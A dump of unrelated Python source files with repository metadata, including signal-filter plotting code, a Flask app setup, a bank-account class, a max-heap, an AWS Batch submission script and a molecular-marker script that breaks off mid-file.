snr_train, snr_test = filter.driver()
fin_snr_train.append(snr_train)
fin_snr_test.append(snr_test)
l_plotting(fin_snr_train, fin_snr_test)
#for higher learning rate
lr = [0.75, 0.7, 0.6, 0.5, 0.4, 0.3, 0.25]
#lr = [0.002]
lr.sort()
fin_snr_train = []
fin_snr_test = []
def h_plotting(train_data, test_data):
fig, ax = plt.subplots()
ax.plot(lr, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
ax.plot(lr, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
start, end = ax.get_ylim()
ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
fig.suptitle('Final NMSE vs Learning Rate (higher range) for RNN Filter', fontsize=36)
plt.ylabel('NMSE', fontsize=24)
plt.xlabel('Learning Rate', fontsize=24)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
#plt.show()
plt.savefig('plots/snrvslrh_code.png')
with open('plots/snrvslrh_code.pkl', "wb") as fp:
pickle.dump(fig, fp, protocol=4)
for i in range(len(lr)):
filter = LMSFilter('Mockingbird.wav', epoch = 10, lr = lr[i])
print('For learning rate:', lr[i])
snr_train, snr_test = filter.driver()
fin_snr_train.append(snr_train)
fin_snr_test.append(snr_test)
h_plotting(fin_snr_train, fin_snr_test)
#for filter length
fl = [512, 256, 128, 64, 32, 16, 8, 4]
#fl = [4]
fl.sort()
fin_snr_train = []
fin_snr_test = []
def fl_plotting(train_data, test_data):
fig, ax = plt.subplots()
ax.plot(fl, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
ax.plot(fl, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
start, end = ax.get_ylim()
ax.yaxis.set_ticks(np.arange(start, end, 0.1))
ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
fig.suptitle('Final NMSE vs Filter Length for RNN Filter', fontsize=36)
plt.ylabel('NMSE', fontsize=24)
plt.xlabel('Filter Length', fontsize=24)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
#plt.show()
plt.savefig('plots/snrvsfl_code.png')
with open('plots/snrvsfl_code.pkl', "wb") as fp:
pickle.dump(fig, fp, protocol=4)
for i in range(len(fl)):
filter = LMSFilter('Mockingbird.wav', epoch = 10, tap = fl[i])
print('For filter length:', fl[i])
snr_train, snr_test = filter.driver()
fin_snr_train.append(snr_train)
fin_snr_test.append(snr_test)
fl_plotting(fin_snr_train, fin_snr_test)
|
[
"rohitkumar97@gmail.com"
] |
rohitkumar97@gmail.com
|
1344db5d293e0d52eb43ae1b44c466eb59437167
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02380/s484509438.py
|
102ce45748de53d8af54b0469dd1cd39937af871
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
import math
a,b,C=map(int,input().split())
radC=math.radians(C)
S=a*b*math.sin(radC)*(1/2)
c=a**2+b**2-2*a*b*math.cos(radC)
L=a+b+math.sqrt(c)
h=2*S/a
list=[S,L,h]
for i in list:
print('{:.08f}'.format(i))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
13d862da3d9fcf0fc7917109af3e9ffbe790f080
|
b98d58296d7e69a189015c99c88ac0ca647f6234
|
/ContaEspecial.py
|
fe0c2ca0111cd69572e179f55a4e012d155b6333
|
[] |
no_license
|
RaulRory/contabanco.py
|
41f9a7f6b98dd91326957455baff3d9537d30b66
|
02d7f7f0a5eb3e37bbb2a3b3c0e5901c05cacd39
|
refs/heads/main
| 2023-03-15T02:47:35.182091
| 2021-03-20T19:35:10
| 2021-03-20T19:35:10
| 350,049,176
| 0
| 0
| null | 2021-03-21T16:07:57
| 2021-03-21T16:07:56
| null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
from conta import Conta
class contaEspecial(Conta):
def __init__(self, saldo, numeroConta, nome, salario):
super().__init__(saldo, numeroConta, nome)
self.especial = salario
def criarContaSalario(self):
conta = ContaEspecial()
conta.numeroConta = input("Digite um numero para a sua conta")
conta.saldo = 0
conta.salario = input("Qual o seu salario?")
conta.nome = input("Como você se chama?")
listaContas.append(conta)
print(listaContas)
def receberSalario(self):
salario = int(input(print("Quanto você ganha de salario")))
return salario
def apagarConta(self, numeroConta):
listaContas.excluir(numeroConta)
def alterarConta(self, numeroConta, obejetoAlterado):
listaContas.Ediar(numeroConta, alteracao)
def receberCredito(self):
listaContas.append(receberCredito)
|
[
"noreply@github.com"
] |
RaulRory.noreply@github.com
|
0b7e9ca017455cdac19f64b9c4f129470f69599f
|
677bb2d246c74ce1cacda831e4b1450d93122319
|
/src/ng/menus.py
|
e468078ffa3049d9dd8eaee0766cd4704336aee0
|
[] |
no_license
|
skuldug12/networktools
|
e4b11dbcf0f6893c53ee9700fa758969d35b810d
|
ca8506cfa6648433be3fa936bdb30b71e1560541
|
refs/heads/master
| 2020-12-02T09:44:09.651455
| 2020-01-21T12:25:42
| 2020-01-21T12:25:42
| 230,969,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
import subprocess
#colors
red = "\033[31m"
green = "\033[32m"
yellow = "\033[33m"
blue = "\033[34m"
purple = "\033[35m"
clear = "\033[00m"
#to look coOoOl
menumessages = ['''
{p}:::!~!!!!!:.
.xUHWH!! !!?M88WHX:.
.X*#M@$!! !X!M$$$$$$WWx:.
:!!!!!!?H! :!$!$$$$$$$$$$8X: {b}NETWORKGRAVE{c}
{p}!!~ ~:~!! :~!$!#$$$$$$$$$$8X: ~~~~~~~~~~~~
:!~::!H!< ~.U$X!?R$$$$$$$$MM!
~!~!!!!~~ .:XW$$$U!!?$$$$$$RMM! {p}SCAN{c} {b}THEN{c} {p}DESTROY{c}...
{p}!:~~~ .:!M"T#$$$$WX??#MRRMMM!
~?WuxiW*` `"#$$$$8!!!!??!!!{c} PRESS {b}[ENTER]{c} TO CONTINUE
{p}:X- M$$$$ `"T#$T~!8$WUXU~
:%` ~#$$$m: ~!~ ?$$$$$$
:!`.- ~T$$$$8xx. .xWW- ~""##*"
..... -~~:<` ! ~?T#$$@@W@*?$$ /`
W$@@M!!! .!~~ !! .:XUW$W!~ `"~: :
#"~~`.:x%`!! !H: !WM$$$$Ti.: .!WUn+!`
:::~:!!`:X~ .: ?H.!u "$$$B$$$!W:U!T$$M~
.~~ :X@!.-~ ?@WTWo("*$$$W$TH$! `
Wi.~!X$?!-~ : ?$$$B$Wu("**$RM!
$R@i.~~ ! : ~$$$$$B$$en:`` {p}s k u l{c}
{p}?MXT@Wx.~ : ~"##*$$$$M~ {c}
'''.format(b=blue, c=clear, p=purple, r=red)]
#startscreen
def startscreen():
subprocess.call("clear", shell=True)
print(menumessages[0])
input("PRESS {b}[ENTER]{c}...\n".format(b=blue, c=clear))
subprocess.call("clear", shell=True)
|
[
"noreply@github.com"
] |
skuldug12.noreply@github.com
|
c086bf9fd246880d4532c6f16e0c5ef23ca1cd7c
|
8e508352419ee63f304648ab6d0fc9a950ba9850
|
/app/__init__.py
|
40f24c9f1dcbca0695a3f7c921aa2dae90fd123d
|
[] |
no_license
|
varuntumbe/Mind_readers
|
7e4c861dc53667648c56dd57571b12d40b674d0b
|
44853887afeb3ddf9b14cfa56c6d8b3827ea86cd
|
refs/heads/master
| 2022-12-26T14:25:55.487500
| 2020-10-05T04:34:27
| 2020-10-05T04:34:27
| 297,246,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 979
|
py
|
from flask import Flask
from config import Config
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_admin import Admin
from flask_migrate import Migrate
from flask_security import Security,SQLAlchemyUserDatastore
from app.adminViewModels import HomeAdminView
from werkzeug import secure_filename
import os
#initializing flask app instance
app=Flask(__name__)
app.config.from_object(Config)
os.makedirs(os.path.join(app.instance_path, 'files'), exist_ok=True)
# os.makedirs(os.path.join(app.instance_path, 'profile_pics'), exist_ok=True)
#Bootstrap instance
Bootstrap(app)
#database instance
db=SQLAlchemy(app)
#migrate instance
migrate=Migrate(app,db,render_as_batch=True)
#Admin instance
admin=Admin(app,'FlaskApp',url='/',index_view=HomeAdminView(name='Home'))
from app.models import *
#Flask-security
user_datastore = SQLAlchemyUserDatastore(db,Users,Roles)
securtiy=Security(app,user_datastore)
from app import routes,models
|
[
"varuntumbe1@gmail.com"
] |
varuntumbe1@gmail.com
|
fd2f9e40af42009d2df03ad31acbf7115cfbdb22
|
ec0e202ba914a1d9318c449130eee74223af6c98
|
/rememerme/users/client.py
|
c79c6d6be62bb75e649fba4b1b42f040d57849c3
|
[
"Apache-2.0"
] |
permissive
|
rememerme/users-model
|
0f07c76bdbabf803fc6b8f6fe4aabcde42fe0e34
|
6b62af077ae93f073e9bb831a82ca8f011697277
|
refs/heads/master
| 2020-05-17T00:27:01.990149
| 2014-01-18T05:54:46
| 2014-01-18T05:54:46
| 15,694,812
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
import requests
from rememerme.users.models import User
class UserClientError(Exception):
pass
def strip_trailing_slash(url):
if url[-1] == '/':
return url[:-1]
return url
class UserClient:
DEFAULT_URL = 'http://134.53.148.103'
def __init__(self, session_id, url=DEFAULT_URL):
self.url = strip_trailing_slash(url)
self.session_id = session_id
def create(self, username, password):
return NotImplementedError()
payload = { 'username':username, 'password':password }
r = requests.post(self.url + '/rest/v1/sessions',data=payload)
if r.status_code is not 200:
raise UserClientError(r.text)
return User.fromMap(r.json())
def update(self, user_id, username=None, password=None, email=None):
payload = {}
if username: payload['username'] = username
if password: payload['password'] = password
if email: payload['email'] = email
headers = { 'HTTP_AUTHORIZATION' : self.session_id }
r = requests.put(self.url + '/rest/v1/sessions/%s' % str(user_id), data=payload, headers=headers)
if r.status_code is not 200:
raise UserClientError(r.text)
return User.fromMap(r.json())
def get(self, user_id):
headers = { 'HTTP_AUTHORIZATION' : self.session_id }
r = requests.delete(self.url + '/rest/v1/sessions/%s' % str(user_id), headers=headers)
if r.status_code is not 200:
raise UserClientError(r.text)
return User.fromMap(r.json())
|
[
"andyoberlin@gmail.com"
] |
andyoberlin@gmail.com
|
7573036a1b58cfb47df0a19cefc1cb86c4072450
|
abf2e9ddc4c526e402588ca1074687e6386611b5
|
/ad-hoc/1708/1708.py
|
3823b08e8a6a18b42996609778b5dc993333481b
|
[] |
no_license
|
flavianogjc/uri-online-judge-python
|
199539944066a63164294b2c1af0c32a223bdffa
|
146ff723d690c25506081069648ff77dd74c3981
|
refs/heads/master
| 2022-05-14T21:29:28.687628
| 2022-05-01T17:46:34
| 2022-05-01T17:46:34
| 194,960,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
from math import ceil
if __name__ == '__main__':
a, b = map(float, raw_input().split())
r = ceil(b / (b - a))
print(int(r))
|
[
"flavianogjc@hotmail.com"
] |
flavianogjc@hotmail.com
|
12488c093c1b5ac0f706ce9218050aa2dd4bf6e7
|
17dce439a0fee47c783b26f8ff58f6b4b505ca09
|
/app/models.py
|
3d21b6e64bd314582a9d302282ff43b822ecc2b8
|
[] |
no_license
|
cbrincoveanu/django-example
|
c9b35129ff190da982456f132a8ff373ef71b753
|
0afc8ef5a166cdf920a2a56bc100f39a9d4af714
|
refs/heads/master
| 2022-12-06T07:41:17.726207
| 2020-08-15T18:22:19
| 2020-08-15T18:22:19
| 287,800,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
class Currency(models.Model):
name = models.CharField(max_length=100)
abbreviation = models.CharField(max_length=100)
objects = models.Manager()
def __str__(self):
return f"{self.name} ({self.abbreviation})"
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=100, null=True, blank=True)
objects = models.Manager()
def __str__(self):
return str(self.user)
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
class UserAsset(models.Model):
profile = models.ForeignKey(Profile, on_delete=models.PROTECT, related_name='user_assets')
currency = models.ForeignKey(Currency, on_delete=models.PROTECT)
amount = models.DecimalField(max_digits=19, decimal_places=10)
class Meta:
unique_together = (("profile", "currency"),)
def __str__(self):
return f"{str(self.profile)} ({str(self.currency)})"
|
[
"c.brincoveanu@yahoo.com"
] |
c.brincoveanu@yahoo.com
|
5d1e42d4fcbfa344f5d00f5f5bbb49288f53b5ac
|
559995c23c13f67ee6f342389d0db81081207d87
|
/prjforinfcreditvilfw/vig/estisimurand/sall_aws_sandbox/template_onefile/esr_s1357_submit_job.py
|
9640ff2bd0dc0bdddbcce8ae8bbcf6bb9621c9c1
|
[] |
no_license
|
MacroFinanceHub/PrjForInfCreditVilFW
|
06a6c475d0c846c1578205e062acb0190bcce1c2
|
d2a863656962691f8dc13d205a82c81823040c8b
|
refs/heads/main
| 2023-07-19T05:31:15.992847
| 2021-08-30T14:44:14
| 2021-08-30T14:44:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,237
|
py
|
"""
Assume that:
1. Container on ECR has been updated to contain latest pyfan and thaijmp code
2. A task with the task name below has been submitted.
Note that for different invokations, can adjust the default command and compute
size of registered tasks.
Submit two separate tasks, representing two different regions.
"""
import logging
import pyfan.amto.json.json as support_json
import time
import boto3aws.tools.manage_aws as boto3aws
import parameters.runspecs.compute_specs as computespec
import parameters.runspecs.estimate_specs as estispec
import projectsupport.systemsupport as proj_sys_sup
logger = logging.getLogger(__name__)
FORMAT = '%(filename)s - %(funcName)s - %(lineno)d - %(asctime)s - %(levelname)s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
"""
OPTINAL PARAMETER SPECIFICATIONS
"""
esr_run = 7
it_call_options = 2
if it_call_options == 1:
it_esti_top_which_max = 5
# A1. Main folder name
save_directory_main = 'esti_tst_onefile_xN5'
# A2. subfolder name
esrbstfilesuffix = "_esr_tstN5_aws"
# C1. ITG or x, normal, or detailed
esrbxrditg = "x"
# C2. compute spec key
esrscomputespeckey = "ng_s_t"
# C3. test scale (esti spec key)
esrssttestscale = "_tinytst_"
elif it_call_options == 2:
it_esti_top_which_max = 5
save_directory_main = 'esti_tst_onefile_ITGN5'
esrbstfilesuffix = "_esr_tstN5_aws"
esrbxrditg = "_ITG"
esrscomputespeckey = "b_ng_p_d"
esrssttestscale = "_tinytst_"
# Both regions
ar_regions = ['ce', 'ne']
# ar_regions = ['ne']
# Region-specific combo_type information
# st_cta, st_ctb = 'e', '20201025x_esr_medtst'
st_cta, st_ctb = 'e', '20201025' + esrbxrditg + esrbstfilesuffix
dc_combo_type = {'ce': {'cta': st_cta, 'ctb': st_ctb,
'ctc': 'list_tKap_mlt_ce1a2'},
'ne': {'cta': st_cta, 'ctb': st_ctb,
'ctc': 'list_tKap_mlt_ne1a2'}}
# Region specific speckey
dc_moment_key = {'ce': '3', 'ne': '4'}
momset_key = '3'
dc_compute_spec_key = {1: esrscomputespeckey, 3: 'mpoly_1',
5: esrscomputespeckey, 7: esrscomputespeckey}
dc_esti_spec_key = {1: 'esti' + esrssttestscale + 'thin_1', 3: 'esti' + esrssttestscale + 'mpoly_13',
5: 'esti_mplypostsimu_1', 7: 'esti_mplypostesti_12'}
"""
OPTINAL PARAMETER SPECIFICATIONS
"""
# Start Batch
aws_batch = boto3aws.start_boto3_client('batch')
# This is a already registered task: see esr_s0_register_task.py
jobDefinitionName = 'a-1-thaijmp-runesr-x'
# task info
job_queue = 'Spot'
# common code esr_run specific
# 1. Sepckey
compute_spec_key, esti_spec_key = dc_compute_spec_key[esr_run], dc_esti_spec_key[esr_run]
dc_speckey = {'ce': '='.join([compute_spec_key, esti_spec_key, dc_moment_key['ce'], momset_key]),
'ne': '='.join([compute_spec_key, esti_spec_key, dc_moment_key['ne'], momset_key])}
# 1b. speckey ERS3
compute_spec_key_mpoly, esti_spec_key_mpoly = dc_compute_spec_key[3], dc_esti_spec_key[3]
dc_speckey_mpoly = {'ce': '='.join([compute_spec_key_mpoly, esti_spec_key_mpoly, dc_moment_key['ce'], momset_key]),
'ne': '='.join([compute_spec_key_mpoly, esti_spec_key_mpoly, dc_moment_key['ne'], momset_key])}
# 2. Container options
array_size = estispec.estimate_set(esti_spec_key)['esti_param_vec_count']
it_memory = computespec.compute_set(compute_spec_key)['memory']
it_vcpus = computespec.compute_set(compute_spec_key)['vcpus']
# run by region
dc_responses = {}
for st_regions in ar_regions:
if esr_run == 1 or esr_run == 3:
response = aws_batch.submit_job(
jobName=jobDefinitionName + '-' + st_regions + '-' + proj_sys_sup.save_suffix_time(2),
jobQueue=job_queue,
arrayProperties={'size': array_size},
jobDefinition=jobDefinitionName,
containerOverrides={"vcpus": int(it_vcpus),
"memory": int(it_memory),
"command": ["python",
"/ThaiJMP/invoke/run_esr.py",
str(esr_run),
"-s", dc_speckey[st_regions],
"-cta", dc_combo_type[st_regions]["cta"],
"-ctb", dc_combo_type[st_regions]["ctb"],
"-ctc", dc_combo_type[st_regions]["ctc"],
"-f", save_directory_main]})
elif esr_run == 5 or esr_run == 7:
response = aws_batch.submit_job(
jobName=jobDefinitionName + '-' + st_regions + '-' + proj_sys_sup.save_suffix_time(2),
jobQueue=job_queue,
arrayProperties={'size': it_esti_top_which_max},
jobDefinition=jobDefinitionName,
containerOverrides={"vcpus": int(it_vcpus),
"memory": int(it_memory),
"command": ["python",
"/ThaiJMP/invoke/run_esr.py",
str(esr_run),
"-s", dc_speckey[st_regions],
"-cta", dc_combo_type[st_regions]["cta"],
"-ctb", dc_combo_type[st_regions]["ctb"],
"-ctc", dc_combo_type[st_regions]["ctc"],
"-cte1", dc_speckey_mpoly[st_regions],
"-cte2", str(it_esti_top_which_max),
"-f", save_directory_main]})
else:
raise ValueError(f'The specified esr_run, {esr_run=} is not allowed.')
support_json.jdump(response, 'submit_job--response', logger=logger.info)
dc_responses[st_regions] = response
# Display status
fl_start = time.time()
dc_bl_job_in_progress = {'ce': True, 'ne': True}
dc_it_wait_seconds = {'ce': 0, 'ne': 0}
while (dc_bl_job_in_progress['ce'] or dc_bl_job_in_progress['ne']):
for st_regions in ar_regions:
dc_json_batch_response = dc_responses[st_regions]
# Get Job ID
st_batch_jobID = dc_json_batch_response['jobId']
# Print Job ID
# print(f'{st_batch_jobID=}')
# While loop to check status
# describe job
dc_json_batch_describe_job_response = aws_batch.describe_jobs(jobs=[st_batch_jobID])
# pprint.pprint(dc_json_batch_describe_job_response, width=1)
it_array_size = dc_json_batch_describe_job_response['jobs'][0]['arrayProperties']['size']
if it_array_size >= 1000:
it_wait_time = 300
elif it_array_size >= 100:
it_wait_time = 120
elif it_array_size >= 10:
it_wait_time = 60
else:
it_wait_time = 20
dc_status_summary = dc_json_batch_describe_job_response['jobs'][0]['arrayProperties']['statusSummary']
if dc_status_summary:
# check status
it_completed = dc_status_summary['SUCCEEDED'] + dc_status_summary['FAILED']
if it_completed < it_array_size:
dc_bl_job_in_progress[st_regions] = True
# sleep three seconds
time.sleep(it_wait_time)
dc_it_wait_seconds[st_regions] = round(time.time() - fl_start)
else:
dc_bl_job_in_progress[st_regions] = False
print(f'{st_regions.upper()} ({dc_it_wait_seconds[st_regions]} sec): '
f'ArrayN={it_array_size},'
f'SUCCEEDED={dc_status_summary["SUCCEEDED"]}, FAILED={dc_status_summary["FAILED"]}, '
f'RUNNING={dc_status_summary["RUNNING"]}, PENDING={dc_status_summary["PENDING"]}, '
f'RUNNABLE={dc_status_summary["RUNNABLE"]}')
else:
dc_bl_job_in_progress[st_regions] = True
# empty statussummary
time.sleep(it_wait_time)
dc_it_wait_seconds[st_regions] = round(time.time() - fl_start)
print(f'{st_regions.upper()} ({dc_it_wait_seconds[st_regions]} sec): ArrayN={it_array_size}')
|
[
"wangfanbsg75@live.com"
] |
wangfanbsg75@live.com
|
93b7f21504d58d63e17f2a7e1435cb78ca6999d6
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part009324.py
|
cbdf2c82d8e24b917f93048ece6a2aa7d84ec418
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,298
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher108113(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i3.1.2.0', 1, 1, None), Mul),
(VariableWithCount('i3.1.2.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher108113._instance is None:
CommutativeMatcher108113._instance = CommutativeMatcher108113()
return CommutativeMatcher108113._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 108112
return
yield
from collections import deque
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
09e71736e5e525b379bb96c44c6a7660ed347411
|
6a4aa92c8cf0d7f87039ed76b822780bd525c9fb
|
/Home/urls.py
|
c3fd8014b4ef616799379978a1ed1f4f4ff90cbf
|
[] |
no_license
|
ulugbek1025/Search_doctor
|
8d30d6bf5a27db7d0232d7daac5f71ced050b0fe
|
dcfdb521af2dc3fe3127ced410924c297ea34aae
|
refs/heads/master
| 2023-03-22T23:37:17.025941
| 2021-03-23T08:04:17
| 2021-03-23T08:04:17
| 350,627,110
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
from django.contrib import admin
from django.urls import path,include
from Home import views
from .views import(
SpecialtiesList,
ProceduresList,
ConditionList,
)
app_name='Home'
urlpatterns = [
path('',views.index,name='index'),
#Specialties
path('specialties/',SpecialtiesList.as_view(),name='specialties'),
path('specialties/doctor/<int:doctor_id>/',views.specialties_doctor,name='specialties_doctor'),
#Procedures
path('procedures/',ProceduresList.as_view(),name='procedures'),
path('procedures/doctor/<int:doctor_id>/',views.procedures_doctor,name='procedures_doctor'),
#Condition
path('condition/',ConditionList.as_view(),name='condition'),
path('condition/doctor/<int:doctor_id>/',views.condition_doctor,name='condition_doctor'),
]
|
[
"ulugbekgulomov2525@gmail.com"
] |
ulugbekgulomov2525@gmail.com
|
76f56cd082fbe1e7dcd760ec81b2e5383bba6cbe
|
03c7bed4cbc25c8468f5ccebd71d847ff694d308
|
/algoexpert/continuous_median_handler.py
|
3b174dee4174a0ff68a677a9f8c78430a0e7ef70
|
[] |
no_license
|
besenthil/Algorithms
|
faff1486c560bafbfd8f6fb7a0422d1b8b795d6e
|
5e8a49ffdc7aad1925ef0354208970d3d2cb62d2
|
refs/heads/master
| 2022-02-14T04:26:09.282976
| 2022-02-13T13:35:12
| 2022-02-13T13:35:12
| 51,376,159
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class ContinuousMedianHandler:
def __init__(self):
# Write your code here.
self.median = None
self.num_arr = []
self.low_index = 0
# O(nlogn) - time
# O(n) - space
def insert(self, number):
self.num_arr.append(number)
self.num_arr.sort()
if len(self.num_arr) > 2 and len(self.num_arr) % 2 == 1:
self.low_index += 1
if len(self.num_arr) % 2 == 0:
self.median = (self.num_arr[self.low_index] + self.num_arr[self.low_index + 1]) / 2
else:
self.median = self.num_arr[self.low_index]
def getMedian(self):
return self.median
|
[
"besenthil@gmail.com"
] |
besenthil@gmail.com
|
ff3f576564a64698fd39d488aee3b2df3873b01e
|
9d8e2dd4441c50b443390f76c899ad1f46c42c0e
|
/mit_intro_algos/max_heap.py
|
13d0a325af33fa82b8c19924971ba9c0b20d5f14
|
[] |
no_license
|
vikramjit-sidhu/algorithms
|
186ec32de471386ce0fd6b469403199a5e3bbc6d
|
cace332fc8e952db76c19e200cc91ec8485ef14f
|
refs/heads/master
| 2021-01-01T16:20:52.071495
| 2015-08-03T17:42:29
| 2015-08-03T17:42:29
| 29,119,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,979
|
py
|
"""
Creates a max heap, can also use heap sort algorithm on a pre created array
Uses an array to implement array
My implementation of python heapq module
"""
class MaxHeap:
def __init__(self, ar=[None]):
self.A = ar
if len(self.A) > 1:
self.__create_maxheap()
def __max_heapify(self, index):
left, right = 2*index, 2*index+1
if left < len(self.A) and self.A[index] < self.A[left]:
maximum = left
else:
maximum = index
if right < len(self.A) and self.A[maximum] < self.A[right]:
maximum = right
if maximum != index:
self.A[index], self.A[maximum] = self.A[maximum], self.A[index]
self.__max_heapify(maximum)
return True
return False
def __create_maxheap(self):
if self.A[0]:
self.A.append(self.A[0])
self.A[0] = None
start_index = int((len(self.A)-1)/2)
for i in range(start_index, 0, -1):
self.__max_heapify(i)
def find_max(self):
return self.A[1]
def extract_max(self):
last_index = len(self.A) - 1
self.A[1], self.A[last_index] = self.A[last_index], self.A[1]
max_key = self.A.pop()
max_heapify(1)
return max_key
def insert_key(self, key):
self.A.append(key)
check_index = len(self.A) - 1
parent_index = int(check_index/2)
self.__parent_updatify(parent_index, check_index)
def __parent_updatify(self, parent_index, check_index):
while parent_index >=1 and self.A[parent_index] < self.A[check_index]:
self.A[parent_index], self.A[check_index] = self.A[check_index], self.A[parent_index]
check_index, parent_index = parent_index, int(parent_index/2)
def update_key(self, key, new_key):
key_index = self.find_key(key)
self.A[key_index] = new_key
if not self.__max_heapify(key_index):
self.__parent_updatify(int(key_index/2), key_index)
def find_key(self, key):
"""
Returns index of key in array (self.A). Uses BFS.
"""
from queue import Queue
qu = Queue()
qu.put(1)
key_index = None
while not qu.empty():
element = qu.get_nowait()
if self.A[element] == key:
key_index = element
break
left, right = element*2, element*2+1
if left < len(self.A) and self.A[left] >= key:
qu.put_nowait(left)
if right < len(self.A) and self.A[right] >= key:
qu.put_nowait(right)
else:
print("Key {0} not found".format(key))
del(qu)
return key_index
if __name__ == '__main__':
main()
|
[
"vikram.sidhu.007@gmail.com"
] |
vikram.sidhu.007@gmail.com
|
f583736aeb98af156de12d7ff928aca9a305b7c8
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_exocyst_tags/initial_7607.py
|
f3e10cc911458956f628b86bc422c72bf2469275
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,587
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Sec3_GFPN" not in marker_sets:
s=new_marker_set('Sec3_GFPN')
marker_sets["Sec3_GFPN"]=s
s= marker_sets["Sec3_GFPN"]
mark=s.place_marker((19, 105, 690), (0.15, 0.78, 0.66), 21.9005)
if "Sec3_GFPC" not in marker_sets:
s=new_marker_set('Sec3_GFPC')
marker_sets["Sec3_GFPC"]=s
s= marker_sets["Sec3_GFPC"]
mark=s.place_marker((215, 753, 192), (0.15, 0.78, 0.66), 31.586)
if "Sec3_Anch" not in marker_sets:
s=new_marker_set('Sec3_Anch')
marker_sets["Sec3_Anch"]=s
s= marker_sets["Sec3_Anch"]
mark=s.place_marker((122, 745, 777), (0.15, 0.58, 0.66), 26.9335)
if "Sec5_GFPN" not in marker_sets:
s=new_marker_set('Sec5_GFPN')
marker_sets["Sec5_GFPN"]=s
s= marker_sets["Sec5_GFPN"]
mark=s.place_marker((285, 668, 783), (0.38, 0.24, 0.37), 21.9005)
if "Sec5_GFPC" not in marker_sets:
s=new_marker_set('Sec5_GFPC')
marker_sets["Sec5_GFPC"]=s
s= marker_sets["Sec5_GFPC"]
mark=s.place_marker((266, 354, 710), (0.38, 0.24, 0.37), 31.586)
if "Sec6_GFPN" not in marker_sets:
s=new_marker_set('Sec6_GFPN')
marker_sets["Sec6_GFPN"]=s
s= marker_sets["Sec6_GFPN"]
mark=s.place_marker((732, 670, 594), (0.84, 0.98, 0.24), 21.9005)
if "Sec6_GFPC" not in marker_sets:
s=new_marker_set('Sec6_GFPC')
marker_sets["Sec6_GFPC"]=s
s= marker_sets["Sec6_GFPC"]
mark=s.place_marker((696, 107, 386), (0.84, 0.98, 0.24), 31.586)
if "Sec6_Anch" not in marker_sets:
